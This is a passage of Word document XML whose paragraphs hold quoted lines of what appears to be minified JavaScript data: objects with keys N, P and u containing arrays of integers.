    <w:p w14:paraId="6B8794E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B688317" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379D81C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746459F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DCA150" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 8, 11, 16, 101, 235]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53255DA4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8645C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492FBE08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A1179" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D1D41" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32783FB3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A307DE2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A285C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB226C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF44A46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD22C62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD73FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 15, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22574FDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F5F27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F11FF70" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [4, 5, 12, 13, 15, 16, 17, 18, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10811BDF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 6, 7, 8, 9, 10, 11, 14, 19, 20, 159, 168, 186, 245, 272, 285, 311, 317, 338, 348, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416E59F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D73D3A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8BDE80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3A1C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC12701" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33022C8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573F93B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D4EBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 5, 177, 300, 336]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E325757" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D84BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EA2239" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652FBD58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737FD499" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0BE68C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598512B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6E9CF6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 21, 159, 252, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11886801" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390AB1A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E0B7D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1BA09D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ED7795" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E117315" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78D275" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 6, 9, 11, 12, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2EA693" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 7, 8, 10, 142, 152, 209, 299, 331]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B92799" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30FC63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F39B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 5, 7, 8, 9, 10, 12, 14, 15, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0265A322" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 4, 6, 11, 13, 16, 20, 24, 32, 65, 133, 159, 203, 207, 225, 240, 241, 256, 296, 314, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103002AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE390F3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C8C8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE8C1A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 5, 7, 8, 10, 12, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E593778" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 4, 6, 9, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB1EBB5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AC5500" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945971A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC27978" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BAACD6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C856915" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D0E36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B727AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 7, 8, 11, 14, 15, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B79ED90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 5, 6, 9, 10, 12, 13, 16, 20, 22, 26, 29, 38, 40, 42, 50, 159, 226, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BA5B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41318013" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230B390A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097E9D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 10, 11, 18, 178, 249, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF268DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ADFA59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7169E446" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06673743" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BFB31F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1547856E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D68647" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA5047" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43165848" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45AD9A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21D8EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B7F64" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA31F3B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1F6AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6790EEF6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C4256" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 9, 27, 159, 168, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F9B775" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFD1A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711ADED0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE2C807" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D207A4D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7200B9EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9D720" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 5, 6, 7, 8, 9, 10, 11, 16, 17, 18, 20, 22, 23, 24, 25, 26, 27, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE9D3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 4, 12, 13, 14, 15, 19, 21, 28, 30, 31, 33, 36, 37, 38, 39, 43, 45, 89, 106, 128, 159, 195, 317, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1363AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E41CB1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622DB6B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC6C95F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 8, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27FAE7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1755D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49905DF5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42714C6E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 79]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8DFC4B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514850A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F40A887" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DF8FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6795F9B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F99F2B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50004AE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645D788" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A59EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B085A38" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A0BFC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A7CEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040709F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D15B387" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64950C5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508798B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712BABF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33707D0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [15, 9, 17, 19, 11, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D79DAE5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF8378" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [157, 159, 182, 196, 245, 311, 317, 342]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F36B3C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1265B212" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626D04C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D0E87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C03086B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66AD43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
